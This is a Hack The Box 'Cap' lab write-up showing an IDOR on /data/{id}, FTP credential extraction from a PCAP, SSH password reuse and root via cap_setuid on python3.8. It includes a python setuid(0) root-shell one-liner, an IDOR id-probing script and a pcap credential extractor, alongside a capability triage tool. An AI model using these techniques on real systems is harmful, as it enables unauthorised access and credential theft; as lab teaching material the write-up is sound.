Hack The Box – Cap
Difficulty: Easy
Target IP: 10.10.10.X
Attacker Machine: Kali Linux
Date: 2026
Objective: Obtain User and Root flags
Executive Summary
The Cap machine was compromised through a chain of vulnerabilities starting with an IDOR flaw in the web application that exposed sensitive PCAP files. Credentials extracted from a packet capture granted SSH access as the user nathan. Privilege escalation was achieved by exploiting a misconfigured Python binary with the cap_setuid Linux capability.
1. Reconnaissance & Enumeration
1.1 Port Scanning
nmap -sC -sV -oN nmap.txt 10.10.10.X
Open Ports:
- 21/tcp – FTP
- 22/tcp – SSH
- 80/tcp – HTTP
Answer Task 1: 3 TCP ports are open.
1.2 Web Enumeration
Accessing port 80 revealed a dashboard with a “Security Snapshot” feature. Generating a snapshot redirected to /data/[id].
Answer Task 2: The directory is /data.
2. IDOR Vulnerability Discovery
The path /data/1 contains a sequential numeric identifier with no token or ownership check attached to it. Changing the number (for example to 0 or 2) returned other users' scan results.
Answer Task 3: Yes, it was possible to access other users' scans.
This confirmed an Insecure Direct Object Reference (IDOR) vulnerability: the application looks up the record by id without verifying that the requesting user owns it.
3. PCAP Analysis & Credential Extraction
3.1 Identifying Sensitive Data
Testing multiple IDs showed that /data/0 contained a PCAP file with interesting network traffic.
Answer Task 4: The sensitive PCAP file is at ID 0.
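Added example, not part of the original writeup: a small probe for the sequential identifier. It assumes the capture body is served directly at /data/&lt;id&gt; (on the real page the snapshot view may link to a separate download path; adjust url_for accordingly), fetches a range of ids, records every 200 response for an id that is not the one the application assigned to you, and labels pcap/pcapng bodies by their magic bytes. The fetcher is injected so the logic can be exercised offline; the target host is the same placeholder as in the writeup.

```python
"""Probe a sequential /data/{id} endpoint for IDOR and spot capture files among the responses."""
import urllib.error
import urllib.request

# Assumption: GET http://<target>/data/<id> returns the snapshot body for that id.
# The real application may serve the file from a separate download path; change url_for().
TARGET = "http://10.10.10.X"  # placeholder host, as in the writeup

# First four bytes of the capture formats a "Security Snapshot" could plausibly hand back.
PCAP_MAGIC = {
    b"\xd4\xc3\xb2\xa1": "pcap (little-endian)",
    b"\xa1\xb2\xc3\xd4": "pcap (big-endian)",
    b"\x4d\x3c\xb2\xa1": "pcap nanosecond (little-endian)",
    b"\x0a\x0d\x0d\x0a": "pcapng",
}


def url_for(snapshot_id: int) -> str:
    return f"{TARGET}/data/{snapshot_id}"


def http_fetch(snapshot_id: int):
    """Network fetcher for a live target: returns (status, body) even on 4xx/5xx."""
    try:
        with urllib.request.urlopen(url_for(snapshot_id), timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def classify(body: bytes) -> str:
    """Label a response body by capture-file magic, or 'other' (HTML, empty, ...)."""
    for magic, name in PCAP_MAGIC.items():
        if body.startswith(magic):
            return name
    return "other"


def probe_ids(fetch, ids, my_id: int):
    """Return one record per id that answered 200 and is not our own snapshot.

    Any such record is an IDOR hit: the server handed us another user's object
    without checking ownership. `fetch` is injected so this runs offline in tests.
    """
    hits = []
    for snapshot_id in ids:
        status, body = fetch(snapshot_id)
        if status == 200 and snapshot_id != my_id:
            hits.append({"id": snapshot_id, "bytes": len(body), "type": classify(body)})
    return hits


if __name__ == "__main__":
    # Live run: our own snapshot was id 1, so probe a window around it, including id 0.
    for hit in probe_ids(http_fetch, range(0, 10), my_id=1):
        print(f"id {hit['id']}: {hit['bytes']} bytes, {hit['type']}")
```

Testing id 0 explicitly matters: developers often seed a record before the first real user, and a loop that starts at 1 never sees it.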
3.2 Analyzing the PCAP
Opened the file in Wireshark and filtered for FTP traffic (display filter ftp, or Follow TCP Stream on the port 21 session). FTP sends USER and PASS commands unencrypted, so the login for user nathan was readable in cleartext.
Answer Task 5: The sensitive data was transmitted over the FTP protocol.
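As an added example (not part of the original writeup), the following script does the same extraction without Wireshark: it walks a libpcap file, concatenates each client-to-server TCP stream in capture order, and pairs USER/PASS commands into credentials. It assumes Ethernet/IPv4 captures in the classic pcap format (not pcapng) with in-order segments; there is no real TCP reassembly. The embedded capture is constructed with RFC 5737 addresses and an invented password, not the machine's real traffic.

```python
"""Extract cleartext FTP logins from a libpcap capture (Ethernet/IPv4/TCP), stdlib only."""
import struct
from collections import defaultdict

ETH_HDR = 14
ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6


def _ip(addr: bytes) -> str:
    return ".".join(str(b) for b in addr)


def iter_tcp_segments(pcap: bytes):
    """Yield (src, sport, dst, dport, payload) for every TCP segment in the file."""
    if pcap[:4] == b"\xd4\xc3\xb2\xa1":
        endian = "<"
    elif pcap[:4] == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a classic libpcap file (pcapng is not handled)")
    linktype = struct.unpack(endian + "I", pcap[20:24])[0]
    if linktype != 1:  # DLT_EN10MB: Ethernet
        raise ValueError(f"unsupported link type {linktype}")
    off = 24
    while off + 16 <= len(pcap):
        _sec, _usec, incl_len, _orig = struct.unpack(endian + "IIII", pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < ETH_HDR or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
            continue
        ip = frame[ETH_HDR:]
        ihl = (ip[0] & 0x0F) * 4
        total_len = struct.unpack("!H", ip[2:4])[0]
        if ihl < 20 or ip[9] != IPPROTO_TCP or len(ip) < total_len:
            continue
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack("!HH", tcp[:4])
        data_off = (tcp[12] >> 4) * 4
        yield _ip(ip[12:16]), sport, _ip(ip[16:20]), dport, tcp[data_off:]


def extract_ftp_credentials(pcap: bytes, ftp_ports=(21,)):
    """Pair USER/PASS lines per client->server flow; returns a list of credential dicts."""
    streams = defaultdict(bytes)  # (src, sport, dst, dport) -> concatenated payload
    for src, sport, dst, dport, payload in iter_tcp_segments(pcap):
        if dport in ftp_ports and payload:
            streams[(src, sport, dst, dport)] += payload
    found = []
    for (src, sport, dst, dport), data in streams.items():
        user = None
        for line in data.split(b"\r\n"):
            cmd, _, arg = line.partition(b" ")
            if cmd.upper() == b"USER":
                user = arg.decode(errors="replace")
            elif cmd.upper() == b"PASS" and user is not None:
                found.append({"client": src, "server": dst, "user": user,
                              "password": arg.decode(errors="replace")})
                user = None
    return found


def _frame(src, sport, dst, dport, seq, payload: bytes) -> bytes:
    """Minimal Ethernet/IPv4/TCP frame (checksums zeroed; the parser never verifies them)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0x4000, 64, IPPROTO_TCP, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split(".")))) + tcp
    return b"\x00\x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa\xbb" + struct.pack("!H", ETHERTYPE_IPV4) + ip


def sample_capture() -> bytes:
    """Constructed FTP login (client 192.0.2.10, server 192.0.2.1); invented password."""
    c, s = "192.0.2.10", "192.0.2.1"
    exchange = [
        (s, 21, c, 40001, b"220 (vsFTPd 3.0.3)\r\n"),
        (c, 40001, s, 21, b"USER nathan\r\n"),
        (s, 21, c, 40001, b"331 Please specify the password.\r\n"),
        (c, 40001, s, 21, b"PASS Example-Passw0rd\r\n"),
        (s, 21, c, 40001, b"230 Login successful.\r\n"),
        (c, 40001, s, 21, b"SYST\r\n"),
    ]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # little-endian global header
    for i, (src, sport, dst, dport, payload) in enumerate(exchange):
        frame = _frame(src, sport, dst, dport, 1000 + i, payload)
        out += struct.pack("<IIII", 1700000000 + i, 0, len(frame), len(frame)) + frame
    return out


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else sample_capture()
    for cred in extract_ftp_credentials(data):
        print(f"{cred['client']} -> {cred['server']}: {cred['user']} / {cred['password']}")
```

Run it as `python3 ftp_creds.py 0.pcap` against the downloaded capture; with no argument it parses the built-in sample. Server replies (dport 40001) are ignored because only the client side carries the commands, which also keeps the 331/230 banners from being mistaken for arguments.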
4. Initial Access
4.1 FTP Access
Logged into the FTP service using the extracted credentials.
4.2 Password Reuse
Tested the same credentials on SSH:
ssh nathan@10.10.10.X
The password worked.
Answer Task 6: The password also works on SSH.
5. User Flag
After gaining SSH access:
ls /home/nathan
cat /home/nathan/user.txt
User flag obtained.
6. Privilege Escalation
6.1 Enumeration
Rather than stopping at sudo -l and SUID checks, I enumerated file capabilities, which a find -perm -4000 search does not reveal:
getcap -r / 2>/dev/null
Key finding:
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
6.2 Exploitation
With cap_setuid in the permitted and effective sets (the +ep part of the flags), any process started from this Python binary may call setuid() to any UID, including 0; the extra cap_net_bind_service plays no role here. Since the interpreter runs whatever code the caller supplies, a one-liner switches to root and spawns a shell:
/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Answer Task 8: The vulnerable binary is located at /usr/bin/python3.8.
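Added example, not from the original writeup: a triage script for getcap output that turns the manual reading above into a repeatable check. It parses both the older `path = caps+flags` format and the newer `path caps=flags` format (libcap 2.41 and later), flags capabilities that are root-equivalent when the binary runs attacker-controlled code (interpreters, debuggers, editors), and prints the setcap -r command that removes them. The sample output is constructed: the python3.8 line mirrors the finding above, the remaining lines are invented, and the interpreter list and severity rules are my own choices.

```python
"""Triage `getcap -r / 2>/dev/null` output for privilege-escalation candidates."""
import re

# Capabilities that hand a local user root-equivalent power when set on a file
# whose behaviour the user controls. Values describe what the attacker gains.
DANGEROUS_CAPS = {
    "cap_setuid": "call setuid(0) and become root",
    "cap_setgid": "call setgid(0) and join group 0",
    "cap_dac_override": "bypass file permission checks",
    "cap_dac_read_search": "read any file, e.g. /etc/shadow",
    "cap_sys_admin": "mount, namespace and many other admin operations",
    "cap_sys_ptrace": "attach to root processes and inject code",
    "cap_sys_module": "load kernel modules",
    "cap_chown": "change file ownership",
    "cap_fowner": "bypass ownership checks on chmod and friends",
    "cap_setfcap": "grant capabilities to other files",
}
# Programs that execute caller-supplied code; a capability on them belongs to the caller.
INTERPRETER_RE = re.compile(r"(python|perl|ruby|php|node|lua|tclsh|gdb|vim|nvim|gawk|busybox)[^/]*$")
# Flag letters in getcap output: e = effective, p = permitted, i = inheritable.
CLAUSE_RE = re.compile(r"([a-z_0-9,]+)[+=]([eip]*)$")


def parse_getcap_line(line: str):
    """Return (path, {cap: set(flags)}) for one getcap line, or None for blank input."""
    line = line.strip()
    if not line:
        return None
    if " = " in line:  # libcap < 2.41: /usr/bin/ping = cap_net_raw+ep
        path, capstr = line.split(" = ", 1)
    else:              # libcap >= 2.41: /usr/bin/ping cap_net_raw=ep
        path, _, capstr = line.rpartition(" ")
    caps = {}
    for clause in capstr.split():
        match = CLAUSE_RE.match(clause)
        if not match:
            continue
        for name in filter(None, match.group(1).split(",")):
            caps[name] = set(match.group(2))
    return path, caps


def triage(getcap_output: str):
    """One finding per (file, dangerous capability); severity by how directly it is usable."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps = parsed
        interpreter = bool(INTERPRETER_RE.search(path))
        for cap, flags in caps.items():
            if cap not in DANGEROUS_CAPS or "p" not in flags:
                continue  # inheritable-only entries are not granted on exec of this file
            if interpreter:
                severity = "critical"  # attacker code runs with the capability (+e or not:
                                       # an interpreter can raise a permitted cap itself)
            elif "e" in flags:
                severity = "high"      # depends on what the fixed binary does with it
            else:
                severity = "medium"
            findings.append({"path": path, "cap": cap, "flags": "".join(sorted(flags)),
                             "severity": severity, "gain": DANGEROUS_CAPS[cap],
                             "fix": f"setcap -r {path}"})
    return findings


# Constructed sample; only the python3.8 line reflects the writeup's finding.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/perl cap_dac_read_search=ep
/usr/local/bin/tcpdump = cap_net_raw,cap_sys_ptrace+p
"""

if __name__ == "__main__":
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_GETCAP
    for f in triage(text):
        print(f"[{f['severity']}] {f['path']} {f['cap']}+{f['flags']}: {f['gain']} (fix: {f['fix']})")
```

Pipe the real output in with `getcap -r / 2>/dev/null | python3 cap_triage.py`. Note that cap_net_raw on ping and cap_net_bind_service on a helper are ordinary packaging choices and are left alone; the script only reacts to capabilities that cross the root boundary.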
7. Root Flag
cd /root
cat root.txt
Root flag obtained.
Vulnerability Summary
| # | Vulnerability | Severity | Impact |
|---|---|---|---|
| 1 | IDOR in /data/{id} | High | Access to other users’ PCAP files |
| 2 | Cleartext FTP credentials | High | Credential disclosure |
| 3 | Password reuse (FTP → SSH) | Medium | Lateral movement |
| 4 | Misconfigured Linux capability (cap_setuid on /usr/bin/python3.8) | Critical | Full root privilege escalation |
Full Attack Chain
- Port scan → Discover web service
- Identify IDOR in snapshot feature
- Download sensitive PCAP (ID 0)
- Extract FTP credentials from packet capture
- Reuse credentials for SSH access
- Enumerate Linux capabilities (getcap -r /)
- Exploit cap_setuid on Python 3.8
- Gain root shell
Key Lessons Learned
- Always manually test ID parameters for IDOR vulnerabilities.
- PCAP files frequently contain sensitive data (especially credentials).
- Password reuse across services is extremely common.
- getcap -r / is a critical enumeration step during privilege escalation.
- Linux file capabilities can be as dangerous as SUID binaries and are missed by find -perm -4000 checks.
Machine Owned ✓